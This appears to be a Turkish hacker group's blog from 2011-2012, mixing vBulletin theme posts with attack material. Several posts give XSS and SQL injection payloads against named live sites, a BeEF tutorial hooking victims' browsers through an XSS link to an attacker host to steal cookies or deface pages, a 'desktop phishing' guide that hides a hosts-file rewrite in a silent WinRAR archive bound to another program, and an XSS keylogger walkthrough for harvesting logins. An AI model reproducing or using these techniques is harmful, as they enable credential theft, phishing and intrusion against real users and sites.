darkdevilz etiketine sahip kayıtlar gösteriliyor. Tüm kayıtları göster
darkdevilz etiketine sahip kayıtlar gösteriliyor. Tüm kayıtları göster

19 Ocak 2012 Perşembe

Profil Alanı Kodlamam

Selamun Aleyküm.
Yaklaşık 1 saatte basit bir profil alanı(memberinfo)kodladım ve sizlerle paylaşmak istedim.Sade ve güzel oldu.İsterseniz kodlara bakıp yararlanırsınız iserseniz direk kullanırsınız.
Uzmanlık alanlarını çekerken yan tarafta field6 gibi şeyler yazdığımı göreceksiniz.Siz orada kendi uzm. alan fieldlarınızı yazacaksınız.

 

Direk Kodlar :
http://www.sagorap.net/kodlar.txt

BeEF Anlatım

Selamun Aleyküm arkadaşlar.
Uzun bir süredir anlatım yapmıyorum.Aktiflik sıkıntısı yaşıyordum.Vakit buldum ve bu anlatımı yapmak istedim.
Sizlere BeEF uygulamasından bahsedeceğim.BeEF kişinin tarayıcısını kontrol altına almanızı sağlayan içinde fazla özelliği bulunan bir uygulamadır.Nasıl yediririr derseniz onuda bir aşağılarda anlatıcam.Windows ve backtrack üzerinde kullanılabilir.Backtrackta zaten default olarak gelmektedir.Ben BT üzerinden göstereceğim.Benimde sevdiğim güzel bir yöntemdir.

Bt tarafında BeEF kısmında ulaşmak için
BackTrack - Exploitation Tools - Social Engineering Tools - BeEF XSS Framework - beef
Yolunu izliyoruz :)



Karşınıza bu tip html içerisinde bazı kodlar gelecektir.Bunlar siteye gömmek isterseniz diye javascript kodlarıdır.Ben xss üzerinden anlatıma devam edeceğim.

İlk olarak arada bir adres göreceksiniz http://192.168.87.129/beef/ girdiğiniz zaman karşınıza direk beef ekranı gelecektir zaten.



Apply config diyoruz.
Edit 'pw.php' in BeEF root to alter the password
yazıyor yan tarafta.
pw.php dosyasından şifreye bakarsak default olarak BeEFConfigPass girilmiştir.Apply sonrasında finish'e tıklıyoruz.Moduller vs geliyor.



Şimdi xss kısmında kullanacağımız kodu görmek için http://192.168.87.129/beef/hook/example.php linkine bakıyoruz.

<script language='Javascript' src="http://192.168.87.129/beef/hook/beefmagic.js.php'></script>

kodu geldi.Bunu xss olan bir sitede kullanacağız.Örnek şuan benim elimde TTnet müzik bulunmakta.Bu linki kolayca yedirebiliriz.Kodları xss olan kısma yerleştiriyoruz.

www.ttnetmuzik.com.tr/#arama-<script>alert(document.domain)</script>

http://www.ttnetmuzik.com.tr/#arama-<script language='Javascript' src="http://192.168.87.129/beef/hook/beefmagic.js.php'></script>

Bunu tıklanma kısmı kalıyor.Bazen linkler çok uzun geliyor insanlar tıklamadan önce düşünüyor bu gibi durumlarda linkleri kısaltmak için siteler mevcut.Karşı taraf linke tıkladığı zaman zombies kısmında görünecektir..



Örnek karşı tarayıcıdaki kişiye bir mesaj göndermek istiyoruz.O zaman zombies kısmındaki ip adresine bir kere tıklıyoruz seçili hale getiriyoruz ardından standart modul kısmında alert dialog kısmını seçiyoruz.Mesajı yazıyoruz ve send now diyoruz.Ben sanal pc backtrack üzerinden windows'a uyguluyorum bunları...



Standart modul kısmında en alt kısımda raw javascript görmektesiniz.Buda kurbanda javascript kodlarını çalıştırmanıza olanak sağlar.Böylece cookie bilgilerini çekebilirsiniz.gene standart kısmında deface web page ile sayfayı komple değiştirip kendi yazınızı koyabilirsiniz.

Daha bir çok özellik bulunmaktadır.Ben temel şeylerden ve nasıl yapılacağından bahsettim.Biraz kurcalama ile bu işi kolayca başarabilirsiniz.

Hem zaman derim XSS'de iş var ^^

9 Aralık 2011 Cuma

Pet Listing Cross Site Scripting

Aktiflik sıkıntısını yaşıyorum.Kendi ismim ile bazı işlere imza attım.Ondan dolayı pek boş zamanım olmuyor.Olduğu zamanda şekil a görüntü b böyle araştırıyoruz ^^

# Exploit Title: Pet Listing Script XSS
# Date: 09.12.2011 - 17.00
# Author: Mr.PaPaRoSSe
# Tested On: Win7
# Platform: Php

-------------------------------------------------------------

preview.php?controller=Listings&action=search&listing_search=1&type_id=&bedrooms_from=">



DEMO
http://www.classifiedsgeek.com/pet-listing/demo/preview.php?controller=Listings&action=search&listing_search=1&type_id=&bedrooms_from=">

-------------------------------------------------------------
Contact: paparosse.blogspot.com
Greetz: Http://DarkDevilz.in/
-------------------------------------------------------------
- Mr.PaPaRoSSe / 3spi0n -
~ And All DD'z Family
-------------------------------------------------------------
#~ DarkDevilz - Defence And Destruction Group'z - TURKEY ~#

26 Kasım 2011 Cumartesi

Whois

WHOIS.COM

http://domains.whois.com/

http://domains.whois.com/hosting.php?type=%22%3E%3Cscript%3Ealert%28%22DarkDevilZ%20/%20Mr.PaPaRoSSe%20/%203spi0n%22%29%3C/script%3E

Mr.PaPaRoSSe / DarkDevilz/ 3spi0n

12 Kasım 2011 Cumartesi

Icdomains XSS

# Exploit Title: Icdomains XSS
# Date: 11.11.2011 - 18.20
# Author: Mr.PaPaRoSSe
# Tested On: BackTrack 5 - Win7
# Platform: Php

-------------------------------------------------------------

Searchbox

<script>alert(do cument.cookie)</script>

http://icloudcenter.net/demos/icdomains/searchresults.php

Search

-------------------------------------------------------------
Contact: paparosse.blogspot.com
Greetz: Http://DarkDevilz.in/
-------------------------------------------------------------
3spi0n     -  ALEXTRAX      -  sanTiq0 
Deathless  -  ZyX           -  Tarxes
53rh4+     -  bLaCk_uMo     -  PeRs 
syntaX     -  Mavi_Karalik  -  DarkCOD3R
x-Leader   -  Cyborg        -  Y2J

~ And All DD'z Family
-------------------------------------------------------------
#~ DarkDevilz - Defence And Destruction Group'z - TURKEY ~#



http://packetstormsecurity.org/files/106867/icloudcenter-xss.txt

11 Kasım 2011 Cuma

Desktop Phishing

Selamun Aleyküm arkadaşlar.
Sizlere " Desktop Phishing " hakkında bir anlatım yapacağım.Bu yöntemi bende internette görmüştüm (Sonuçta Bunları Bilerek Doğmadık) denedim 1-2 kere gerçekten güzel yöntemdir.

Şimdi amaç olarak bir dosya oluşturucaz.Sonra kurban bunu açacak.Ardından örnek facebook.com adresinden giriş yapacak şifre bize gelecek.Fake mantığıdır.Desktop Phishing tarafında kurban örnek olarak facebook.com adresinde gezinmeye devam eder ama aslında fake bir sayfada gezinmektedir.Domain ismi gerçek sayfa fake.

Bunlar için windows tarafında hosts dosyasını kullanacağız.Bu hosts dosyası ise domain adlarını ve bu domainlere ait ip adreslerini saklamaktadır.

Bu hosts dosyası C:\WINDOWS\system32\drivers\etc tarafında dır. Açmak için notepad kullanabilirsiniz.

Şimdi örnek olarak bir hosts dosyamızın içinde neler var bakalım.



Evet görüldüğü gibi bu şekilde.

Örnek site olarak facebook.com olacak

Şimdi kendimize ait bir host var diyelim.Ve içine fake dosyalarını attık.
Şimdi diyelim ki facebook.com 1.1.1.1 ip adresi üzerinden.Bizim hostumuzun ip adresi ise 4.4.4.4. O zaman eğer host tarafında 1.1.1.1 olan facebook tarafını 4.4.4.4 yaparsak facebook.com domain olarak görülür ama veri için başvurduğu ip adresi 4.4.4.4 olmaz mı ? OLUR tabiki de..

O zaman hosts kısmını şu şekilde düzenliyoruz.


vet bu şekilde düzenliyoruz.Kendinize kaydetmeyin bunu kurbana yedirmemiz lazım ^^

Şimdi ne yapacağız diye basit bir tekrar yaparım.Kurbanın eğer hosts dosyasını daha demin ki gibi düzenlersek kurban facebook.com domaini üzerinden takılmaya devam eder ama aslında bizim fake ip adresinde takılmaktadır.

Şimdi buralar basitti bir diğer kısım ise kurbana bunu nasıl yaptıracağız?

Bunun için winrar tarafında ufak bir hile yapacağız.Adam örnek ddz dosyasını açtığı zaman bizim hosts dosyamız otomatik olarak kendini adamın C:\WINDOWS\system32\drivers\etc klasörüne kopyalacak.

Peki bunu nasıl yapacağız derseniz onuda anlatalım.Hazırladığımız hosts dosyasını masaüstüne alalım.
Tabiki gerekli ayarları yaptık düzenlemeleri yaptık dosya hazır.

Şimdi dosyamıza sağ tıkıyoruz ve arşive ekle diyoruz.

SFX arşivi oluştur adında bir buton var ona tıklıyoruz.genel tarafında oluyor...

Şimdi ise Gelişmiş Diyoruz ve SFX seçeneklerine tıklıyoruz.

Çıkacak yok tarafına C:\WINDOWS\system32\drivers\etc yazıyoruz.




Şimdi ise modlar tarafına gelerek tümünü gizle diyoruz.
Güncelleme kısmında ise varolan dosyaları atla diyoruz.

Ardından ise tamam tamam diyerekten çıkıyoruz.

Masaüstünde ddz.exe adında bir dosya oluşuyor.

Bunu kurbana açtırmamız lazım.Herhangi bir exe binder ile birleştirerek kurbana veriyoruz açtığı zaman ve tamam dediği zaman işlem tamamlanmış oluyor.

Bu anlatımda bu kadar dediğim gibi güzel bir yöntemdir.1-2 kişide denedim güzelcene oldu :)
Bu hack huck işlerinden anlamayan insanlar %65 yerler.Ama gereksiz yere onlara böyle birşey yapmanında anlamıyok değilmi ? ^^

Selametle / Mr.PaPaRoSSe / DarkDevilZ

7 Kasım 2011 Pazartesi

Web Sayfa Çizimi

Selamun aleyküm
Bir ara modem de sorun vardı bende ne yapayım derken photoshop'u açtım ve böyle bir ders ortaya çıktı.Bu basit diyenler için yeni başlayanlara bir hazinedir diyorum.Çünkü ben kendimi biliyorum ilk açtığımda adımı zor yazmıştım ^^
Basit bir çalışma oldu mantığı anlamanız için yaptım.Birden photoshop'u açtım ve gelişi güzel bir şeyler yaptım.Eğer vakit bulursam bunun kodlamasınıda video olarak çekerim...



LİNK:
http://hotfile.com/dl/134422601/062f8da/darkdevilz.zip.html

86.177 kb.
22 dakika 12 saniye.
Şifre yok.

6 Kasım 2011 Pazar

SmartJobBoard Cross Site Scripting

# Exploit Title: SmartJobBoard XSS
# Date: 05.11.2011 - 18.14
# Author: Mr.PaPaRoSSe
# Tested On: BackTrack 5 - Win7
# Platform: Php

-------------------------------------------------------------


DEMO:
http://www.smartjobboard.com/demo/search-resumes/

Keywords : Enter

http://www.smartjobboard.com/demo/search-results-resumes/?action=search&listing_type[equal]=Resume&keywords[exact_phrase]=%3Cscript%3Ealert%28%22DDz+Mr.PaPaRoSSe%22%29%3C%2Fscript%3E

-------------------------------------------------------------
Contact: paparosse.blogspot.com
Greetz: Http://DarkDevilz.in/
-------------------------------------------------------------
3spi0n - ALEXTRAX - sanTiq0
Deathless - ZyX - Tarxes
53rh4+ - bLaCk_uMo - PeRs
syntaX - Mavi_Karalik - DarkCOD3R
x-Leader - Cyborg - Y2J

~ And All DD'z Family
-------------------------------------------------------------
#~ DarkDevilz - Defence And Destruction Group'z - TURKEY ~#

http://packetstormsecurity.org/files/106637/smartjobboard-xss.txt

5 Kasım 2011 Cumartesi

What’s happening?

Gördüğüm kadarı ile artık çoğu insan twitter tarafına geçti geçmesede bir twitter açtı.Benim yoktu açmamıştım gereksiz görmüştüm.Baktım ki bir tane açmanın zamanı gelmiş artık.Ve şeytana uyaraktan açtık işte bir adet...

https://twitter.com/#!/MrPaPaRoSSe

1 Kasım 2011 Salı

Mndajans Script SQL Injection

# Exploit Title: Mndajans Script SQL Injection
# Date: 29.10.2011 - 16.13
# Author: Mr.PaPaRoSSe
# Tested On: BackTrack 5 - Win7
# Platform: Php

-------------------------------------------------------------

Scripts are mndbilgisayar
-------------------------------
default user : mndajans
default pass : servis
Admin panel : /admin/

Default User & Pass & Admin demo
http://alpdizayn.com.tr/admin/
--------------------------------
MND Kontrol PANEL
SQL Ýnjection

UrunDetay&id=4' SQL

-------------------------------------------------------------
Contact: paparosse.blogspot.com
Greetz: Http://DarkDevilz.in/
-------------------------------------------------------------

3spi0n - ALEXTRAX - sanTiq0
Deathless - ZyX - Tarxes
53rh4+ - bLaCk_uMo - PeRs
syntaX - Mavi_Karalik - DarkCOD3R
x-Leader - Cyborg - Y2J

[And DD'z Family]

[DarkDevilz - Defence And Destruction Group'z - TURKEY]

http://packetstormsecurity.org/files/106419/mndajans-sql.txt

22 Ekim 2011 Cumartesi

Rinkya Cross Site Scripting


# Exploit Title: Rinkya Cross Site Scripting
# Date: 22.10.2011 - 17.52
# Author: Mr.PaPaRoSSe
# Tested On: BackTrack 5 - Windows xp sp3
# Platform: Php

-------------------------------------------------------------

search.php

http://www.rinkya.com/membership/search.php

"><script>alert("DDz Mr.PaPaRoSSe")</script>

http://www.rinkya.com/membership/search.php?sType=Auction&s........

-------------------------------------------------------------
Contact: paparosse.blogspot.com
Greetz: http://DarkDevilz.in/
-------------------------------------------------------------
3spi0n     -  ALEXTRAX      -  sanTiq0  
Deathless  -  ZyX           -  Tarxes
53rh4+     -  bLaCk_uMo     -  PeRs 
syntaX     -  Mavi_Karalýk  -  DarkCOD3R

[And DD'z Family]

[DarkDevilz - Defence And Destruction Group'z - TURKEY]

21 Ekim 2011 Cuma

WordPress ThemeCity Cross Site Scripting

# Exploit Title: WP ThemeCity XSS
# Date: 21.10.2011 - 19.05
# Author: Mr.PaPaRoSSe
# Tested On: BackTrack 5 - Windows xp sp3
# Platform: Php
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

Demo : http://www.steveledwards.com/

Search Box
"><script>alert("DDz Mr.PaPaRoSSe")</script>

http://www.steveledwards.com/?s=%22%3E%3Cscript%3Ealert%28%22DDz+
Mr.PaPaRoSSe%22%29%3C%2Fscript%3E&submit=Search

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
# We attempted to work, you can not imagine.
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
# Contact: paparosse.blogspot.com
# Greetz: Http://DarkDevilz.in/
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
Mr.PaPaRoSSe  Black_Umo  ALEXTRAX  Brs_BaRoN  ZyX  x-Leader
DARKCOD3R  Santiq0  53rh4t  PerS   3spi0n  syntaX

[And DD'z Family]

[DarkDevilz - Defence And Destruction Group'z - TURKEY]
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> 
 
 packetstorm
http://packetstormsecurity.org/files/106071/wpthemecity-xss.txt           

16 Ekim 2011 Pazar

honda

http://dog.honda.co.th/
http://www.zone-ar1.com/attackmirror/mirror.php?id=15720

14 Ekim 2011 Cuma

XSS keylogger

"Serhat kardeşim için hızlı olarak anlattım yakında video çekeceğim."


Selamun aleyküm arkadaşlar.
Mynet'te xss adlı bir konum vardı.İşte orada xss açığını keylogger gibi kullanmayı anlatacaktım.Şimdilik resimli bir anlatım yapıyorum.Ama ileride videolu olarak anlatabilirim boş bir günümde.

Şimdi bizim amacımız şu olacak.Adama bir link atacağız ve adam bu linke tıklayacak.İşte birşeyler yapacak ve login olacak.Gelen şifreyi ise biz alacağız mantık bu şekilde.Bu iş için kullanacağımız site ise mynet.

Bu olayı gerçekleştirebilmek için bize gerekenler;
BackTrack5
xss-harvest.pl (Konunun altında paylaştım.)
Xss açıklı login sistemli site
Açık bir port (bende 443)
Ve bir adet Mr.PaPaRoSSe ^^

Şimdi bir sitemize bakalım ;
http://fesmekan.mynet.com/
tarafını kullanacağım.

Şimdi ilk olarak backtrack tarafında xss-harvest.pl dosyamızı wget ile alıyoruz çağırıyoruz çekiyor her ne ise ondan sonra chmod 777 yaparak ilk işlemi bitiriyoruz.Çektiğim site ismini sildim çünkü benim depo sitem o herşeyim orada :)





Evet güzel gidiyoruz.Şimdi bizim xss-harvest için kurmamız gereken bazı perl modulleri var.
Bunun için uygulayacağımız komut ise;
sudo apt-get install libnet-server-perl



biraz beklemeniz lazım.Tamamdır iş bitti.Şimdi şey yapalım eee kurbana atacağız linki düzenleyelim.
Xss sitede şu şekilde bulunmaktadır.

http://fesmekan.mynet.com/istanbul/m...%3E&l=istanbul

Görüldüğü gibi.Kendi yazdığımız kısımları silelim böylece boş bir alan kalacak.

http://fesmekan.mynet.com/istanbul/mekanlar/?q= &l=İstanbul

Gördüğünüz o boşluğa ise belirli kodlar koyacağız.
Şimdi bu dursun backtrack tarafına giderek bir bağlantı işlemini yapalım.

./xss-harvest.pl -l -p 443



yapıyoruz.Burada ben 443. port açık olduğu için böyle birşey yaptım.Siz hangi port açıksa onu kullacaksınız.
Şimdi tekrar kod kısmına dönelim en son şu şekildeydi.

http://fesmekan.mynet.com/istanbul/mekanlar/?q= &l=İstanbul

Bunun için şöyle bir kod kullanacağız.

9 Ekim 2011 Pazar

Kolifa Haber Script 1.3 SQL Injection

# Exploit Title: Kolifa Haber Script 1.3 SQL
# Date: 08.10.2011 - 20:36
# Author: Mr.PaPaRoSSe
# Download Script: http://scripti.org/demo.php?id=97
# Tested On: BackTrack 5 - Windows xp sp3
# Platform: Php
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

Vunl file : show.php

Exploit:

http://localhost/haber_pro/kategorigoster.php?kat_id=SQL injection

Panel:
http://haberpro.awardspace.com/haber_pro/admin/admingiris.php

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
# We attempted to work, you can not imagine.
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
# Contact: paparosse.blogspot.com
# Greetz: Http://DarkDevilz.in/
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
' 3spi0n ~# Black_Umo ALEXTRAX Brs_BaRoN ZyX x-Leader
L4NETLY GrayTendriL DARKCOD3R Santiq0 53rh4t PerS Mavi Karanlik Tarxes

[And DD'z Family]

[DarkDevilz - Defence And Destruction Group'z - TURKEY]
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>



http://packetstormsecurity.org/files/view/105624/kolifahaber-sql.txt

Ebuddy XSS of p4

Şimdi ben giriş yaparken böyle birşey aklıma geldi.Daha önce bulunmuş denenmiş olabilir.Ben kendim düşündüm bunu onun için paylaşıyorum.

XSS yahoo,AIM,ICQ kısımlarında bulunmaktadır.

Author : Mr.PaPaRoSSe - DarkDevilz.in
Title  : ebuddy xss

http://www.ebuddy.com

<script>alert("DarkDevilz / Mr.PaPaRoSSe")</script>

8 Ekim 2011 Cumartesi

havadurumu mynet xss

Bulalı bayağı oldu öyle arşive atmışım.Yakında çekeceğim video için paylaşıyorum açıkçası.Şimdi bununla nolcak derseniz backtrack tarafında bu xss açıklarını bir keylogger gibi kullanabilirsiniz.Onun da anlatımını boş bir günümde yapacağım.Bu aralar biraz meşgul'um.Ben önceden siteyi koydum ^^

##########################
# Title: havadurumu mynet xss
# Author: Mr.PaPaRoSSe | DarkDevilZ.in
##########################

http://havadurumu.mynet.com/



p4 vb theme

Selamun Aleyküm arkadaşlar.
Can sıkıntısına bir tane vb teması yaptım.Paylaşayım dedim.
Sabah 6:40'da başladım 14:43'de bitti.
Cevapla butonundan ihbar butonuna kadar hepsi çalışmaktadır.
Yani örnek olarak internette bir arama yaptığınızda çoğu sitede adam linkler kısmını resim olarak vermektedir.Ama siz yeni konu dediğinizde birşey çıkmayacaktır.Yeni konu dediğinizde yeni konunun açılması için şöyle bir kod gerekmektedir.

<if condition="$show['newthreadlink']"><a href="newthread.php?$session[sessionurl]do=newthread&amp;f=$foruminfo[forumid]" rel="nofollow"><img src="files/kate/newkonu.png" alt="$vbphrase[post_new_thread]" border="0" />

Bu tip bir kod işinizi görenecektir.Ben bunların hepsini hazırladım yaptım bitirdim halletim ^^
Üstte header tarafındaki menude kurallar kısımlarına filan link vermedim siz onları kafanıza göre yaparsınız.

3.8.6 üzerinde yaptım.Menuleri filan kendim ps ile yaptım.Uzmanlık alanları kısmı yada işte ünvan madalyon filan eklemedim çünkü şimdi postbit_legacy tarafına baktığınız da benim kodlardan filan kafanız karışsın istemedim.Siz isterseniz eklersiniz zor birşey değil sonuçta.
Onun dışında Memberinfo tarafı ile pek oynamadım basit bir düzenleme yaptım.Şu anda yazmaya devam ettiğim bir memberinfo var bittiğinde paylaşacağım.
Başka bir sayfada login olmanız lazım.Login kısmını sildim.İnternetten vbulletin ayrı sayfadan login diye aratırsanız kodları çıkar zaten.Yada vb ek sayfa yapmak şeklinde.

Resimleri üyenin gözünden ve misafirin gözünden olmak üzere 2'ye ayırdım.
Üye olmayanlara menuleri gizledim.
Resimleri ps ile birleştirdim.

-----------------------------------------------------------
Misafirin Gözlerinden;

Forumhome







------------------------------------------------------------

Bence o kadar da kötü sayılmaz ^^
Benden bu kadar takıldığınız bir yer olursa sorarsınız.
Selametle...


Not: Rar'ın içine 2 tane vbulletin-style.xml koydum.Bende biri çalışıyor biri çalışmıyor.Arkadaşta da diğeri hata vermiş.Her ihtimale karşı 2'sinide koydum.Ve ss'lerde imleç çıkmış kusura bakmayın mozillada  tam ben basarkene gelmiş ^^


İNDİR
http://www.dosya.tc/server4/EzMYNC/tema.rar.html
http://hotfile.com/dl/131791239/93b3d54/tema.rar.html

7 Ekim 2011 Cuma

Lessons library sql | p4

Bildiğiniz gibi bulduğum açıkları paylaşmıyordum.Paylaşmadığım içinde artık yavaş yavaş hiç açık aramamaya başladım.En son bulduğum açık 2,5 ay öndesine ayit.Bende 1-2 tane bulup yayınlayam dedim.


# Exploit Title: Lessons library sql injection
# Date: 06.10.2011 - 18.53
# Author: Mr.PaPaRoSSe
# Download Script: http://up.tsmim.com/uploads/files/tsmim-e47615d4bd.zip
# Tested On: BackTrack 5 - Windows xp sp3
# Platform: Php
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

Vunl file : show.php

Exploit:

http://localhost/droos/show.php?cid=2&page=Sql İnjection

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
# We attempted to work, you can not imagine.
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
# Contact: paparosse.blogspot.com
# Greetz: Http://DarkDevilz.in/
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
Mr.PaPaRoSSe Black_Umo ALEXTRAX Brs_BaRoN ZyX x-Leader
L4NETLY GrayTendriL DARKCOD3R Santiq0 53rh4t PerS

[And DD'z Family]

[DarkDevilz - Defence And Destruction Group'z - TURKEY]
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

packetstorm
http://packetstormsecurity.org/files/view/105599/tsmim-sql.txt